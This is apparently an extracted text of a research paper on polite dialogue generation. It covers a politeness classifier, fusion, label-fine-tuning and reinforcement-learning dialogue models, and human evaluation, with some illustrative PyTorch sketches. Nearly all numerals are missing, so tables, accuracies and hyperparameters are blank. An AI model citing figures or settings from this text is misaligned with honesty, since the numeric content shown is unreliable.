the two retrieval baselines and the continuous version transactions of the association for computational linguistics, vol. , pp. – , . action editor: colin cherry. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. alogue responses, using data from separate style and dialogue domains: the stanford politeness cor- pus (danescu-niculescu-mizil et al., ) with wikipedia and stack exchange requests, and the movietriples dialogue corpus (serban et al., ) with imsdb movie scripts, respectively. each of our three models is based on a state-of-the-art polite- ness classifier and a sequence-to-sequence dialogue model. the first model (fusion) employs a late fu- sion technique to merge the response generation de- coder of the dialogue model with a language model trained on polite utterances chosen by the politeness classifier. the second label-fine-tuning (lft) model prepends to the input utterance a single politeness la- bel whose embedding is continuously scaled by the politeness score of the target sequence during train- ing. this score is determined by feeding the cor- responding ground-truth target sequence to our po- liteness classifier. during test time, we show that the lft model is able to control the politeness level of generated responses by simply scaling the la- bel’s embedding by the continuous target politeness score of our choice. our third reinforcement-based model (polite-rl) encourages politeness generation by using the continuous-scale politeness score of the decoder-sampled sentence as a reward (via mixed- objective policy gradient methods), i.e., polite utter- ances are encouraged with positive reward, and rude ones discouraged with negative reward. hence, our models only need a style classifier (without parallel data) to automatically influence and encourage continuous-scale stylistic language generation in a complex dialogue setup, which also requires maintaining relevance to conversational context. each of these models requires minimal changes to the architecture of either the underly- ing sequence-to-sequence (seq seq) dialogue base model or the style classifier, and hence can mod- ularly update the architecture with the latest state- of-the-art dialogue models or style classifiers (and for diverse styles). in addition, we also employ two retrieval-based models, where we output the re- sponse which has the highest match with the in- put context from a set of classifier-picked polite responses or manually-picked generic polite utter- of the lft model were added to the feb , resubmission based on reviewer discussions. ances. these two retrieval models serve as parallel investigations on the performance of our three pro- posed generative models above. we conducted multiple human evaluations (for style and dialogue quality) on amazon mechani- cal turk (mturk) (buhrmester et al., ) for all three models plus the base sequence-to-sequence di- alogue model and the retrieval-based models, and show that while the fusion and the two retrieval models increase the politeness level of responses at the cost of poorer dialogue quality, both our lft and polite-rl models can successfully produce po- lite responses (capturing several politeness strategies discussed by brown and levinson ( )), without sacrificing dialogue coherence and relevance com- pared to the base seq seq model (hence better bal- ance between politeness and dialogue quality). 
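schematically, the three mechanisms just described reduce to the following computations. the linear interpolation in the fusion step, the scalar mixing weights, and the absence of a reward baseline in the rl term are our simplifying assumptions; the text above specifies only the general mechanisms.

import numpy as np

def fuse(p_dialogue, p_polite_lm, alpha=0.3):
    # late fusion: mix the dialogue decoder's next-word distribution with a
    # language model trained on stand-alone polite utterances (alpha is assumed)
    p = (1 - alpha) * np.asarray(p_dialogue) + alpha * np.asarray(p_polite_lm)
    return p / p.sum()

def lft_inputs(source_embeddings, label_embedding, politeness_score):
    # label-fine-tuning: prepend a label vector scaled by the politeness score of
    # the target (at training time) or by a score of our choosing (at test time)
    return np.vstack([politeness_score * np.asarray(label_embedding), source_embeddings])

def polite_rl_loss(ml_loss, log_prob_sampled, politeness_score, beta=0.5):
    # mixed objective: maximum-likelihood loss plus a policy-gradient term whose
    # reward is the classifier's politeness score of the sampled response
    return (1 - beta) * ml_loss + beta * (-politeness_score * log_prob_sampled)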
we also compare the output dialogue politeness levels of the continuous lft model for three different po- liteness levels. finally, we present several detailed qualitative and quantitative analyses, including pos- itive and negative output examples, automatic metric results on output responses, classifier error analysis, and visualization of the rl rewards. related works . models for style transfer style transfer with parallel data there have been multiple works on style transfer with parallel data. these tasks can often be solved by directly ap- plying some variation of translation-based seq seq model discussed in the previous section. for ex- ample, xu et al. ( ) use a phrase-based statis- tical model, and jhamtani et al. ( ) use a stan- dard seq seq model to convert modern language to shakespeare-style language by treating style transfer as a translation task. some labeled sequence trans- duction methods have also been proposed (kobus et al., ; yamagishi et al., ; johnson et al., ). for example, kikuchi et al. ( ) are able to control the length of the summarization text by feeding to the seq seq base model a label that in- dicates the intended output length in addition to the source input. our lft model also adopts this la- beling idea, and is able to handle a similar situation but without parallel data, because by labeling each target sequence in the training set with its politeness classifier score, we are essentially converting non- parallel data to (noisy) parallel data (by using a clas- sifier with high accuracy). style transfer without parallel data several previous works have looked at style transfer with- out parallel data, in both vision (gatys et al., ; zhu et al., ; liu and tuzel, ; liu et al., ; taigman et al., ; kim et al., ; yi et al., ), and text (sennrich et al., a; hu et al., ; ghosh et al., ; zhao et al., ; mueller et al., ; wang et al., ; luan et al., ). among these models, some are bag-of-words based, i.e., they use style-related keywords to annotate the target sequences in the training set. for example, to control how formal the output sequences are in a en-de translation task, sennrich et al. ( a) la- beled each target sequence based on whether it con- tains formal or informal verbs and pronouns (hon- orifics). to build a language model that generates utterances with the desired style, ficler and gold- berg ( ) annotated their text with meta-data and keywords/pos tags based heuristics, while ghosh et al. ( ) also adopted keyword spotting based on a dictionary of emotional words. the basic ideas of their models are similar to that of our lft model. however, these keyword-spotting approaches do not fully extend to our politeness generation task, be- cause politeness strategies follow complex patterns of grammar, word order, and phrasing (danescu- niculescu-mizil et al., ). for example, the po- liteness of please depends on where it occurs in a sentence, and what other politeness markers it co- occurs with (e.g., ‘could/would you’ style counter- factual modals vs. ‘can/will you’ style indicative modals). therefore, our novel polite dialogue mod- els are based on an accurate neural classifier, which is better at capturing several compositional paralin- guistic features (as visualized in aubakirova and bansal ( ), whose politeness classifier we ex- tend). moreover, our lft and polite-rl models can generate a continuum of style levels based on the continuously-scaled (by the politeness score) label embedding or reinforcement rewards. 
lastly, there have also been style transfer mod- els that rely on the latent representation of text and use variational auto-encoders or cross-alignment to disentangle the representation of content and style in text (hu et al., ; shen et al., ; zhao et al., ; fu et al., ). during inference time, the latent style representation is combined with new content to generate stylized, content-preserving text. although both fall into the category of style transfer, our task differs in two important aspects from their tasks. first, as opposed to the task of strict content preservation when rephrasing a sentence to a differ- ent style, our task is about maintaining good rele- vance to the context when adding style, especially useful for dialogue-based tasks. another distinc- tive trait of our task is that politeness resides in a spectrum rather than a fixed category or topic (e.g., shakespearean), and our models can treat politeness as a continuum, i.e., controlling the politeness level by adjusting the fusion rate in the fusion model, the magnitude of the continuous label in the lft model, or the rl weight in the polite-rl model. . multi-task learning and style transfer in order to obtain a persona-based conversational agent, luan et al. ( ) proposed a multi-task learning (mtl) based approach: they train a seq seq model with conversation data and an au- toencoder with non-conversational persona-related data from target speakers, and share the decoder parameters of these two models so that the gener- ated responses can be adapted to the style of the target-speaker. this way of incorporating mtl into seq seq learning was first investigated by dong et al. ( ) and luong et al. ( ) to achieve mul- tilingual nmt. in addition, sennrich et al. ( b) also employed mtl to improve nmt models with monolingual (non-parallel) data. these approaches are related to our fusion model, because we use our classifier to obtain noisy polite target sequences (non-parallel data) that a polite language model trains on; next, during inference, we combine the parameters of the language model with a genera- tive dialogue model trained on parallel data. in gen- eral, our models are also related to previous works like johnson et al. ( ), who adopted labeled se- quence transduction methods for mtl tasks, be- cause our task also involves adapting generated re- sponses to different politeness styles and optimizing two sub-tasks’ (namely response and politeness gen- eration) loss functions (related to a multi-task setup). . politeness studies danescu-niculescu-mizil et al. ( ) created the stanford politeness corpus and trained an svm classifier using a list of useful linguistic features based on strategies from brown and levinson’s theory of politeness (brown and levinson, ). aubakirova and bansal ( ) recently took an end- to-end neural approach to this politeness classifi- cation task by training a cnn model that directly learns to identify polite requests without using any hand-engineered features, while still improving on prediction accuracy. they also visualized what fea- tures the cnn model was learning and discovered some new features along the way. our classifier mainly extends their work by adding a bi-directional lstm layer (hochreiter and schmidhuber, ; schuster and paliwal, ) before the cnn layer to capture long-distance relationships in the sentence, which leads to higher cross-domain performance. 
a related early work in personality-based dialogue is mairesse and walker ( ), who studied introvert/extrovert personality language based on templated content and sentence planning (via personality dimensions such as hedges, tag questions, negations, subject implicitness, etc.). relatedly, sennrich et al. ( a) use an english to german translation task to present a model that can generate target sequences that are either formal or informal, specifically based on honorifics-related verbs and pronouns. our task is more general, taking into account several politeness-related paralinguistic features of brown and levinson ( ) and allowing end-to-end trainable stylistic dialogue generation with a polite-to-rude spectrum (based on a politeness classifier, without relying on parallel data). moreover, our approaches allow simply replacing the politeness classifier with any other emotion or personality based language classifier to generate stylistic dialogue for that new style dimension.

politeness classification model

in order to develop an accurate politeness classifier for effective use in stylistic dialogue response generation, we extend and improve upon the state-of-the-art cnn model of aubakirova and bansal ( ), and propose a bi-directional lstm followed by a convolutional layer (see figure ), in order to both capture long-distance relationships in the sentence as well as windowed filter based features.

figure : our lstm-cnn politeness classifier (word embeddings, bi-directional lstm with concatenated hidden states, convolution layer, max-pooling, softmax over polite/rude).

for a sentence $v_{1:n}$ (where each token $v_i$ is a d-dim word embedding vector), the lstm layer first produces hidden states $h_{1:n}$ (where $h_t$ is the concatenation of forward and backward hidden states at time step t). a filter $m$ is then applied on a window of $u$ hidden states. this produces a convolution feature $c_i = f(m \cdot h_{i:i+u-1} + b)$, where $f$ is a non-linear function and $b$ is a bias term. applying the filter to each possible window of hidden states gives the feature map $c = [c_1, \dots, c_{n-u+1}] \in \mathbb{R}^{n-u+1}$. the output of the convolutional layer is then fed to a max-pooling layer (collobert et al., ) which gives $\hat{c} = \max\{c\}$ for the filter. filters of various sizes are used to obtain multiple features. the result is then passed to a fully-connected softmax layer that outputs probabilities over two labels, namely polite and rude.

our classification model achieves comparable in-domain accuracy and improved cross-domain accuracy over the state-of-the-art results reported in danescu-niculescu-mizil et al. ( ) and aubakirova and bansal ( ). we will discuss these results in detail in section .

polite-style dialogue models

in this section, we first describe our base dialogue model, i.e., the core (backbone) dialogue architecture upon which the three proposed politeness models are built, and then present these three models that can generate polite dialogue responses. as a parallel investigation on the performance of our proposed models, we also employ two retrieval-based polite dialogue models toward the end.

figure : fusion model: the output probability distributions of the decoder and the polite-lm are linearly mixed to generate the final decoded outputs.
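before turning to the dialogue models, the politeness classifier of the previous section can be summarized with a small illustrative sketch. the pytorch module below uses hypothetical dimensions, filter sizes, and names; it is a rough sketch of the bi-lstm-then-cnn idea, not the authors' implementation.

```python
# illustrative sketch only: a bi-lstm followed by convolutions over the lstm hidden
# states, max-pooled per filter and fed to a 2-way softmax (polite vs. rude).
# all hyperparameters here are hypothetical, not the paper's exact configuration.
import torch
import torch.nn as nn
import torch.nn.functional as F

class LstmCnnPolitenessClassifier(nn.Module):
    def __init__(self, vocab_size, emb_dim=300, hidden_dim=128,
                 filter_sizes=(3, 4, 5), num_filters=64):
        super().__init__()
        self.embedding = nn.Embedding(vocab_size, emb_dim)
        # bi-directional lstm: h_t is the concatenation of forward/backward states
        self.lstm = nn.LSTM(emb_dim, hidden_dim, batch_first=True, bidirectional=True)
        # one 1-d convolution per window size u, applied over the hidden states
        self.convs = nn.ModuleList([
            nn.Conv1d(2 * hidden_dim, num_filters, kernel_size=u) for u in filter_sizes
        ])
        self.out = nn.Linear(num_filters * len(filter_sizes), 2)  # polite / rude

    def forward(self, token_ids):                    # (batch, seq_len)
        emb = self.embedding(token_ids)              # (batch, seq_len, emb_dim)
        h, _ = self.lstm(emb)                        # (batch, seq_len, 2*hidden_dim)
        h = h.transpose(1, 2)                        # (batch, 2*hidden_dim, seq_len)
        # c_i = f(m . h_{i:i+u-1} + b), then max-pool over positions for each filter
        pooled = [F.relu(conv(h)).max(dim=2).values for conv in self.convs]
        features = torch.cat(pooled, dim=1)          # (batch, num_filters * #sizes)
        return F.softmax(self.out(features), dim=1)  # probabilities over {polite, rude}

# usage sketch: one of the two output probabilities can be read as a continuous
# politeness score, which is how the dialogue models below use the classifier.
model = LstmCnnPolitenessClassifier(vocab_size=10000)
scores = model(torch.randint(0, 10000, (2, 20)))     # two sentences of 20 tokens
```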
base seq seq dialogue model

our base dialogue model is a simple sequence-to-sequence (seq seq) model that consists of a two-layer bi-directional lstm-rnn encoder to encode the conversation history turns, and a four-layer lstm-rnn decoder to generate the response. additive attention from the output of the encoder is applied to the last layer of the decoder. this architecture is almost identical to that proposed by bahdanau et al. ( ), except with more layers (similar to shao et al. ( )). our base dialogue model achieves perplexity and word error rate results on par with those reported for the popular hierarchical hred models in serban et al. ( ), thus serving as a good base model to incorporate style into. details will be discussed in section . .

fusion model

inspired by the 'late fusion' approach in venugopalan et al. ( ), our fusion model (fig. ) combines the response generation decoder of the base seq seq dialogue model with a language model (polite-lm) trained exclusively on polite utterances. these utterances are chosen by feeding the classifier all response utterances in the movietriples training set, and only keeping those with politeness scores greater than a certain threshold (set to . in our experiments, as will be discussed in section . ). the polite-lm model is a two-layer lstm-rnn based on jozefowicz et al. ( ).

during inference time, we used the language model to re-score the final output of the seq seq decoder (for each time step) by computing a linear combination of the output vocabulary distributions proposed by the seq seq model and polite-lm. specifically, let $p^{s2s}_t$ and $p^{lm}_t$ denote the output probability distributions proposed by the seq seq model and the lm model at time t, respectively. the final 'fused' distribution $p_t$ for that time step is:

$$p_t = \alpha\, p^{s2s}_t + (1 - \alpha)\, p^{lm}_t \quad (1)$$

where the fusion ratio $\alpha$ is a hyperparameter that indicates how much seq seq output will influence the final output.

label-fine-tuning model

there are at least two drawbacks of the fusion model. first, half of its output is determined by a polite language model that has not attended to the conversation context, making the response more likely to be irrelevant. second, the model does not learn politeness during training, but is forced to be polite only during inference time. to address these two issues, we present our label-fine-tuning (lft) model, which prepends a predicted continuous style label at the beginning of each input sentence to specify the intended politeness level.

figure : label-fine-tuning model: during training, the embedding of the prepended label is scaled by the style classifier's continuous score on the ground-truth (target) sequence. during testing, we scale the embedding of the label by the desired (continuous) politeness score of the generated response.

specifically, we add to the vocabulary a single politeness label and attach with it a trainable word embedding, just like what we would do to a normal token. then, the way we make it continuous is by scaling its embedding vector with the (intended) politeness score of the target sequence.
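to make these two mechanisms concrete, the late-fusion mixing of eq. (1) and the scaling of the prepended label embedding can be sketched as follows. this is an illustrative python/pytorch fragment; the vocabulary size, embedding dimension, and example politeness scores are hypothetical and it is not the authors' implementation.

```python
# illustrative sketch of (a) the late-fusion mixing of eq. (1) and (b) scaling the
# prepended label's embedding by a politeness score; all names and shapes are hypothetical.
import torch

def fuse_distributions(p_s2s, p_lm, alpha=0.5):
    """linearly mix the seq2seq and polite-lm output distributions at one time step."""
    return alpha * p_s2s + (1.0 - alpha) * p_lm

def scaled_label_embedding(label_embedding, politeness_score):
    """scale the single trainable label embedding by a continuous politeness score."""
    return politeness_score * label_embedding

# usage sketch
vocab = 8
p_s2s = torch.softmax(torch.randn(vocab), dim=0)        # decoder distribution at step t
p_lm = torch.softmax(torch.randn(vocab), dim=0)         # polite-lm distribution at step t
p_t = fuse_distributions(p_s2s, p_lm, alpha=0.5)        # eq. (1); still sums to 1

label_emb = torch.randn(512, requires_grad=True)        # embedding of the politeness label
polite_input = scaled_label_embedding(label_emb, 0.9)   # example score for a polite response
rude_input = scaled_label_embedding(label_emb, 0.1)     # example score for a rude response
```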
during training, this score is obtained by feeding the ground-truth target sequence (response) to the politeness classifier (see figure ), while during test time, we are free to scale the prepended politeness label with different scores of our choice (i.e., when we want the model to generate a polite response, we scale the label's embedding by a score between . and . , whereas, to generate a rude response, we scale the embedding by a score between . and . ). this approach is related to the 'numerically-grounded' language model (spithourakis et al., ), except that we scale the politeness label embedding by its corresponding politeness score, rather than concatenating the two as input to the lstm.

thus, the lft model is able to simultaneously produce polite, neutral and rude responses depending on the prepended label, similar to recent multi-label, multi-space, and zero-shot machine translation work using language identity or style labels (sennrich et al., a; johnson et al., ; ghosh et al., ). intuitively, this prepended label serves as the prior for the intended style of the generated response sequence, while the source utterance serves as the prior for the content of the generated sequence. in other words, the label and the source sentence cooperatively determine what the overall response looks like.

(although we trained the politeness classifier to be binary, its outputs are probabilities ranging from . to . ; this allows us to interpret the outputs as continuous politeness scores. note that the position of the label did not affect the results much (e.g., sennrich et al. ( a) appended the label at the end of the input sequence); moreover, our models use a bidirectional encoder, which does not distinguish between the beginning and end of the source sequence.)

polite reinforcement learning model

figure : polite-rl model: upper-right shows max-likelihood (ml) training with generated and ground-truth target sequences; lower-right shows rl training with a randomly sampled response generated by the model and the reward it generates after getting fed into the style classifier. note that the attention mechanism is not shown here for clarity.

the lft model incorporates style more directly into its training procedure than the fusion model, but it still does not fully exploit the value of the style classifier since it only supervises the dialogue model once by initially classifying the style of all the target sequences in the training set. ideally we would want the classifier to constantly monitor and influence what style the model produces. moreover, many contexts do not naturally elicit a polite response, in which case we do not want to force the model to generate an utterance that matches the target politeness score, but rather to ask the model to generate as polite and natural a response as it could. these limitations motivate us to propose the third model: polite reinforcement learning model (polite-rl), where the style classifier regularly updates the model parameters (via sampling-based policy gradient) with continuous-spectrum rewards that encourage decoder-generated response samples to be polite and discourage them from being rude.

following work from paulus et al. ( ), our loss function consists of two terms.
the first term is the traditional maximum likelihood loss ($\mathcal{L}_{ml}$), which we refer to as the teacher forcing part. the other one is the reinforcement learning loss ($\mathcal{L}_{rl}$) based on politeness scores, which we refer to as the reinforce part. the total loss $\mathcal{L}$ then takes the form:

$$\mathcal{L} = \mathcal{L}_{ml} + \beta\, \mathcal{L}_{rl} \quad (2)$$

where $\beta$ is a hyperparameter indicating how much weight we want to give to the style reward component of the loss. (for example, it is hard to be polite in answering questions like "what's your name?"; the most "legitimate" answer would be "my name is xx.", rather than "thanks for asking! my humble name is xx if you would allow me to say so.")

the teacher forcing part minimizes the average of the maximum-likelihood loss at each decoding step. specifically, let $y^* = \{y^*_1, y^*_2, \dots, y^*_n\}$ be the ground-truth response for a given source (conversation history) utterance sequence $x$. the maximum-likelihood training objective is the minimization of the loss:

$$\mathcal{L}_{ml} = -\sum_{t=1}^{n} \log p(y^*_t \mid y^*_1, \dots, y^*_{t-1}, x) \quad (3)$$

we use a policy gradient method (williams, ; sutton et al., ) to calculate the second term in the objective function. specifically, we sample a generated response for each input sequence (conversation history) $x$, and assign to it a reward $r$, which in our case is the politeness classifier's probability of the response classified as polite. let $y^s = \{y^s_1, y^s_2, \dots, y^s_n\}$ be the sampled response; then the reinforce part of the loss is:

$$\mathcal{L}_{rl} = -(r - r_b) \sum_{t=1}^{n} \log p(y^s_t \mid y^s_1, \dots, y^s_{t-1}, x) \quad (4)$$

where $r_b$ is a baseline that helps reduce variance during training (ranzato et al., ). note that we can invert the classifier scores or reward (by flipping the first minus sign in eq. (4)), if we want to encourage rudeness as the style, instead of politeness. this also shows that an advantage of our implementations of the lft model over the polite-rl model (at the cost of shallower training) is that the lft model can multitask to simultaneously produce responses of different style labels at test time, whereas reward-based reinforcement learning can only work in one direction at a time (based on the reward sign). (however, to make the reward-based model capable of multitasking, one could also prepend various politeness labels to each of the contexts in the training set, thus generating several examples out of one context, and encourage the generated response to be consistent with the given label. we will explore this extension in future work.)

retrieval-based models

we employ two retrieval-based baseline models as a sanity check to the proposed approaches' performance: the first with oracle-level fluency, the second with additional oracle-level politeness.

classifier-based retrieval: following lowe et al. ( ), for a [x1, y, x2] triple, our retrieval model treats the context (x1, y) and each response (x2) as two documents and converts them to their tf-idf based vectors (ramos, ) to check for similarity. specifically, we first obtain all candidate responses in the training set that are polite, and calculate their tf-idf vectors. then for each context tf-idf vector in the test set, we calculate its cosine similarity with that of each such polite-classified candidate response, and output the one with the highest value. intuitively, for each context we are choosing a response that is both polite and most relevant to (having the most word overlaps with) the context.

generic- : this approach is similar to the one above but uses the manually-chosen most-polite generic utterances as candidate responses for each context; a small sketch of the shared tf-idf matching step is given below.
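the sketch uses scikit-learn purely for illustration; the candidate list and query are placeholders rather than the actual classifier-picked or manually-picked utterances.

```python
# illustrative sketch of the tf-idf retrieval step shared by the two baselines:
# the context and each candidate response are converted to tf-idf vectors and the
# candidate with the highest cosine similarity to the context is returned.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

def retrieve_response(context, candidates):
    vectorizer = TfidfVectorizer()
    # fit on candidates plus the context so both live in the same tf-idf space
    matrix = vectorizer.fit_transform(candidates + [context])
    candidate_vecs, context_vec = matrix[:-1], matrix[-1]
    similarities = cosine_similarity(context_vec, candidate_vecs)[0]
    return candidates[similarities.argmax()]

# usage sketch: the candidate pool would be the classifier-picked polite responses
# (classifier-based retrieval) or the small manually-picked shortlist (generic baseline)
polite_candidates = ["thanks for the answer .", "could you help please ?", "no problem ."]
print(retrieve_response("can you help me fix this error ?", polite_candidates))
```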
specifically, for generic- , we collect all ground-truth polite requests from the stanford politeness corpus, split each one into sentences, and then manually pick the most frequent polite sentences. we then determine which one to retrieve as a response for each input context, based again on the tf-idf vector similarity method described above. (we treat only responses in the higher, more-accurate percentile of [ . , . ] range as polite (and [ . , . ] range as rude). the final polite sentences for generic- are "thanks.", "can you help?", "can you clarify?", "no problem.", "you're welcome.", "interesting question.", "thanks for the answer.", "could you help please?", "can you elaborate?" and "nice."; the rejected ones are "what have you tried?" and "what do you think?". this shortlist needed some human filtering because in the stanford politeness corpus, each polite example consists of two sentences, and sometimes not both of them are polite, i.e., one of them could be neutral (more generic and task-based).)

experimental setup

datasets

as discussed above, we propose models that can deal with style data coming from an unpaired, non-parallel domain, different from the domain of the dialogue dataset. for our style (politeness) domain, we use the stanford politeness corpus (danescu-niculescu-mizil et al., ), which contains a collection of requests from wikipedia (wiki) editor's talk pages and the stack exchange (se) question-answering communities. based on scores from human annotators, these requests are labeled with either polite or rude, with each class equally consisting of , requests for the wikipedia domain and , requests for the stack exchange domain. for the content (dialogue) domain, we use the popular movietriples dialogue corpus (serban et al., ), which contains k conversations extracted from imsdb movie scripts in x-y-x triplet-utterance format, where x and y correspond to two movie characters (and the model's task is to generate the last response).
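before describing the evaluation setup, the mixed maximum-likelihood plus reinforce objective of the polite-rl model (eqs. (2)-(4) above) can also be made concrete with a short sketch. the per-token log-probabilities, reward value, loss weight, and baseline below are placeholders, not values from the actual model.

```python
# illustrative sketch of the polite-rl objective, eqs. (2)-(4): a weighted sum of the
# maximum-likelihood (teacher-forcing) loss on the ground-truth response and a
# reinforce loss on a sampled response, whose reward is the politeness classifier's
# polite-probability. the log-probabilities, reward, beta, and baseline are placeholders.
import torch

def ml_loss(log_probs_ground_truth):
    # eq. (3): negative log-likelihood of the ground-truth tokens
    return -log_probs_ground_truth.sum()

def rl_loss(log_probs_sampled, reward, baseline=0.5):
    # eq. (4): reinforce loss scaled by (r - r_b); flipping the sign of the
    # reward term would encourage rudeness instead of politeness
    return -(reward - baseline) * log_probs_sampled.sum()

def total_loss(log_probs_ground_truth, log_probs_sampled, reward, beta=1.0, baseline=0.5):
    # eq. (2): L = L_ml + beta * L_rl
    return ml_loss(log_probs_ground_truth) + beta * rl_loss(log_probs_sampled, reward, baseline)

# usage sketch with dummy per-token log-probabilities for a 6-token response;
# in the real model these would come from the decoder under teacher forcing / sampling
lp_gt = torch.log(torch.rand(6, requires_grad=True))      # log p(y*_t | y*_<t, x)
lp_sample = torch.log(torch.rand(6, requires_grad=True))  # log p(y^s_t | y^s_<t, x)
reward = 0.92                                              # classifier's polite-probability
loss = total_loss(lp_gt, lp_sample, reward)
loss.backward()                                            # gradients flow through both terms
```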
( ) found that little additional in- formation was provided by adding in more metrics on top of overall dialogue quality, and it also confused mturkers in many scenarios. we had similar observations in our initial human study on mturk. sio, ). for both dialogue quality and polite- ness evaluations, the human raters were shown the conversation context (input) and the six shuffled re- sponses (from the six models). clear instructions (closely following those from wang et al. ( )) corresponding to each score were shown in the in- terface. more specifically, we asked the annota- tors to first read the context and each of the gener- ated/retrieved responses, and assign a score to each response. they then scored each response on a five- point likert scale (likert, ) (for both polite- ness and dialogue quality), hence providing absolute measurements but in an overall comparative (rela- tive) setting. we explicitly stated that it is possible for them to find some conversation disconnected or lacking context, and encouraged them to make the best guess when in doubt. using similar instruc- tions (and a -sized sample), we also performed a separate -way lft model comparison by setting its target politeness scores to . , . , and . , re- spectively. automatic since there do not exist ground-truth stylized versions of the response to the movietriples conversations, we only use automatic evaluation metrics as complementary and trend-verification in- formation to the primary human perception studies in this work: we compute bleu (a phrase-matching based metric; (papineni et al., )) as an approx- imation of dialogue quality as used by some previ- ous work (ritter et al., ; galley et al., ; li et al., c). note that we choose to report bleu scores not to draw any immediate conclusion (liu et al. ( ) found that bleu does not corre- late well with human studies on dialogue quality), but rather to check for match with the trends from the likert scale is a bipolar scaling method that maps each score to a text item that describes the score, e.g., our polite- ness level interface uses ‘polite’, ‘slightly polite’, ‘neutral’, ‘slightly rude’, ‘rude’; and our dialogue quality study uses ‘very good’, ‘good’, ‘acceptable’, ‘poor’, and ‘very poor’, in- stead of the abstract scores - . note that we did not adopt pairwise comparisons because first, it will create several inde- pendent sets of pairwise results ( sets in our case), which also raises the cost substantially, and secondly, pairwise comparison does not tell us “by how much” a response is better/equal/worse than the other. in contrast, our absolute scores can help future research compare more directly to our results. we will release our detailed instructions and mturk interfaces, plus our anno- tation scores on our webpage. human evaluation. we also compute the politeness classifier’s scores as an approximation of politeness level. sec. . discusses these results. . training details we now present some important training details. embedding initialization for all our models, we initialized the embedding matrix with word vec trained on google news dataset (about billion words) (mikolov et al., ); we use xavier initializer (glorot and bengio, ) for out-of- vocabulary words. pretraining following serban et al. ( ), we pretrained the seq seq base model for epochs with q-a subtle corpus (ameixa et al., ), which contains around . m movie subtitle q&a pairs. implementation details we used -dim em- beddings, the adamoptimizer (kingma and ba, ) with a learning rate of . 
, and a dropout rate of . . all models were trained with a mini- batch of size . the classifier was trained for epochs, and the three proposed stylistic models were each trained for epochs. the polite language model used in the fusion model was trained until there was no improvement for perplexity on a held- out dev-set (all tuning decisions were made on the respective dev-sets). we use a balanced value of . for the fusion ratio (α in eq. ), and . for the rl weight (β in eq. ) after some light empirical tun- ing. due also to the nearly perfect balance between the number of polite and rude examples in the stan- ford politeness corpus, we set the baseline reward of polite-rl (rb in eq. ) to a constant . at all times. note that for effective and non-confusing mturk studies, for all our models (the base model we will add all reproducibility details and more analysis examples in a post-publication supplement on our webpage. https://code.google.com/archive/p/ word vec/ we also tried using a self-critical baseline as in rennie et al. ( ), but found that our way of setting the constant-based baseline led to better responses. we speculate that this is be- cause a self-critical approach tries to make an utterance as po- lite as possible, which usually leads to a few very generic and very polite responses at convergence (because the model gets a positive reward only when the sampled utterance is more polite than the greedy-decoded one). wiki se svm . % . % cnn . % . % lstm-cnn . % . % table : politeness classification accuracies. top results are boldfaced. and the three stylistic models), we avoid unk to- kens to appear in the generated response, by not back-propagating the mle loss for these tokens. we also do the same for a short list (around ) of very offensive swear words (from wiktionary). results in this results section, we first briefly present our po- liteness classifier (sec. ) and base dialogue model (sec. . ) results, and then focus on the stylistic- dialogue results (retrieval and generative). . politeness classification results following danescu-niculescu-mizil et al. ( ), we use accuracy (i.e., percentage of correctly la- beled messages for binary polite/rude labels) to eval- uate our politeness classifier’s generalization ability. specifically, we used data from the training set of wiki, and test on both the test set of wiki and the entire se (stack exchange) corpus. we used the same train-validation-test split setup ( : : ) as in aubakirova and bansal ( ). as shown in table , our lstm-cnn model improved cross- domain accuracy (while maintaining comparable in- domain accuracy) compared to that of the svm and cnn models reported in aubakirova and bansal ( ). this is similar to how zhou et al. ( ) also found that a combination of lstm-rnns and cnns is superior to an lstm-rnn or cnn alone for sentiment classification, likely because the joint model captures both long-distance relationships as well as local windowed filter-based features, and this could make it easier to separate in-domain and out- of-domain properties. we also observe more im- provement on cross-domain accuracy because it has much more space for improvement, as opposed to note that this train/dev/test split is only for verifying the strength of the classification model. the classifier used for the three proposed polite-dialogue models was trained on the en- tire stanford politeness corpus (due to the small amount of politeness-labeled data available). model ppl ppl@l wer wer@l rnn . . . . hred . . . . hred-bidir. . . . . 
seq seq . . . . table : ppl, wer results computed on {u ,u ,u } and ppl@l, wer@l computed on {u } conditioned on {u ,u }. lower is better for all metrics. top results are boldfaced. in-domain accuracy which is already very close to human performance. the higher accuracy is also important because we need a cross-domain-accurate style classifier so that it can effectively stylize re- sponses in diverse dialogue corpora domains such as movietriples. . base dialogue model results next, in table , we show that our starting point, base dialogue model is comparable in quality to a popular, representative previous model of serban et al. ( ), trained on the same corpora with sim- ilar model architectures. we use their perplexity (ppl) and word error rate (wer) metrics. in or- der to have a meaningful perplexity (i.e., the prob- ability of regenerating a reference response) com- parison between two language generation models, they should have the same vocabulary set. since the vocabulary of our politeness dialogue models is a combination of vocabulary sets drawn from the movietriples and stanford politeness corpora, for fair comparison in this section, we separately train a base seq seq model following exactly the vocabu- lary ( , most frequent tokens, plus an unk for the rest) and preprocessing protocols from serban et al. ( ). we bootstrapped the model with epochs on the subtle corpus (see sec. . ), and then trained on movietriples until there was no improvement on perplexity for the validation set. the comparison for this base model with their hierarchical-encoder hred models is presented in table . as shown, we get comparable results overall on all metrics, and hence we have a good starting-point dialogue model, to which we add politeness, via the following three approaches. . stylistic dialogue model results primary human evaluation results in this sec- tion, we present our primary human evaluation politeness quality difference retrieval . . . generic- . . . seq seq . . . fusion . . . lft . . . polite-rl . . . table : mturk human evaluation results on politeness level and dialogue quality (as well as the absolute value difference between the two, to show balance) of the re- trieval models, seq seq and the three proposed genera- tive models (avg. of two annotators is shown here). top results are boldfaced. (mturk) results on both politeness level and dia- logue quality (context-relevance) of the generated response, based on two annotators and a -sized test sample. table shows the annotator-average scores for each of these two metrics and their ab- solute difference, based on our likert scales of to (see sec. . ). we can first see that all three of our stylistic generative models improve on polite- ness compared to the seq seq base model. how- ever, the fusion model’s politeness gain is not sta- tistically significant, and moreover it achieves this minor politeness level improvement at the cost of significantly compromising dialogue quality (be- cause its output is half-determined by a standalone politeness-trained lm that ignores context). next, we see that the lft model is the most po- lite (stat. significance of p < . over the seq seq model), and also has dialogue quality close (statisti- cally equal) to that of seq seq. our final polite-rl model wins over seq seq on politeness (stat. sig- nificance of p < . ) as well as achieves a small improvement in dialogue quality (though not at stat. significance level; but it is stat. 
